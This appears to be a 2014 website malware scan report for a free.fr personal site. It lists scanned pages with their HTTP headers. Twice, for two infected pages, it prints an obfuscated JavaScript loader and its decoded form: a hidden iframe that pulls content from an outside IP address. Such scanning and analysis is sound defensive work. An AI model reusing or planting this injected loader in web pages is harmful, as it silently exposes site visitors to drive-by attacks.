Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yoel1.free.fr
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://yoel1.free.fr/ | HTTP/1.1 200 OK Connection: close Date: Sat, 20 Dec 2014 15:56:27 GMT Accept-Ranges: bytes ETag: "c80df-ae9-4814f31a" Server: Apache/ProXad [Sep 23 2014 15:26:28] Content-Length: 2793 Content-Type: text/html Last-Modified: Sun, 27 Apr 2008 21:41:46 GMT | clean |
http://yoel1.free.fr/m | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, no-store, must-revalidate Connection: close Date: Sat, 20 Dec 2014 15:56:27 GMT Location: http://yoel1.free.fr/m/ Server: Apache/ProXad [Sep 23 2014 15:26:28] Content-Type: text/html; charset=iso-8859-1 | clean |
http://yoel1.free.fr/m/ | 200 OK Content-Length: 14625 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v4814f307d8fa3(v4814f307dbad1){ function v4814f307dc298 () {var v4814f307dcef0=16; return v4814f307dcef0;} return(parseInt(v4814f307dbad1,v4814f307dc298()));}function v4814f307dd628(v4814f307dde06){ var v4814f307dedf0=2; var v4814f307de5f7='';for(v4814f307de9f3=0; v4814f307de9f3<v4814f307dde06.length; v4814f307de9f3+=v4814f307dedf0){ v4814f307de5f7+=(String.fromCharCode(v4814f307d8fa3(v4814f307dde06.substr(v4814f307de9f3, v4814f307dedf0))));}return v4814f307de5f7;} document.write(v4814f307dd628('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3937333162343265207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3731393638292B276363375C272077696474683D363932206865696768743D313034207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')); Decoded script: <SCRIPT>window.status='Done';document.write('<iframe name=9731b42e src=\'http://77.221.133.150/.if/go.html?'+Math.round(Math.random()*71968)+'cc7\' width=692 height=104 style=\'display: none\'></iframe>')</SCRIPT> Antivirus reports:
Hidden iFrame found. size: 1x1 style: hidden src: http://url <iframe src='http://url' width='1' height='1' style='visibility: hidden;'> | ||
http://yoel1.free.fr/m/acc.php | 200 OK Content-Length: 14481 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
http://yoel1.free.fr/m/sins.php | 200 OK Content-Length: 17075 Content-Type: text/html | clean |
http://yoel1.free.fr/m/sid.php | 401 Unauthorized Content-Length: 41 Content-Type: text/html | clean |
http://yoel1.free.fr/test404page.js | 404 Not Found Content-Length: 13253 Content-Type: text/html | clean |
http://yoel1.free.fr/m/membres.php | 200 OK Content-Length: 15803 Content-Type: text/html | clean |
http://yoel1.free.fr/m/akc.php | 200 OK Content-Length: 14091 Content-Type: text/html | clean |
http://yoel1.free.fr/m/ajou.php | 200 OK Content-Length: 14115 Content-Type: text/html | clean |
http://yoel1.free.fr/m/modif.php | 200 OK Content-Length: 14129 Content-Type: text/html | clean |
http://yoel1.free.fr/m/code.php | 200 OK Content-Length: 14132 Content-Type: text/html | clean |
http://yoel1.free.fr/m/page.html | 404 Not Found Content-Length: 13253 Content-Type: text/html | clean |
http://yoel1.free.fr/m/index.php | 200 OK Content-Length: 14625 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v4814f307d8fa3(v4814f307dbad1){ function v4814f307dc298 () {var v4814f307dcef0=16; return v4814f307dcef0;} return(parseInt(v4814f307dbad1,v4814f307dc298()));}function v4814f307dd628(v4814f307dde06){ var v4814f307dedf0=2; var v4814f307de5f7='';for(v4814f307de9f3=0; v4814f307de9f3<v4814f307dde06.length; v4814f307de9f3+=v4814f307dedf0){ v4814f307de5f7+=(String.fromCharCode(v4814f307d8fa3(v4814f307dde06.substr(v4814f307de9f3, v4814f307dedf0))));}return v4814f307de5f7;} document.write(v4814f307dd628('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3937333162343265207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3731393638292B276363375C272077696474683D363932206865696768743D313034207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')); Decoded script: <SCRIPT>window.status='Done';document.write('<iframe name=9731b42e src=\'http://77.221.133.150/.if/go.html?'+Math.round(Math.random()*71968)+'cc7\' width=692 height=104 style=\'display: none\'></iframe>')</SCRIPT> Antivirus reports:
Hidden iFrame found. size: 1x1 style: hidden src: http://url <iframe src='http://url' width='1' height='1' style='visibility: hidden;'> | ||
http://yoel1.free.fr/m/function.main | 404 Not Found Content-Length: 13253 Content-Type: text/html | clean |
http://yoel1.free.fr/m/function.include | 404 Not Found Content-Length: 13253 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yoel1.free.fr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 15:56:27 GMT
Accept-Ranges: bytes
ETag: "c80df-ae9-4814f31a"
Server: Apache/ProXad [Sep 23 2014 15:26:28]
Content-Length: 2793
Content-Type: text/html
Last-Modified: Sun, 27 Apr 2008 21:41:46 GMT
...2793 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: yoel1.free.fr
Referer: http://www.google.com/search?q=yoel1.free.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.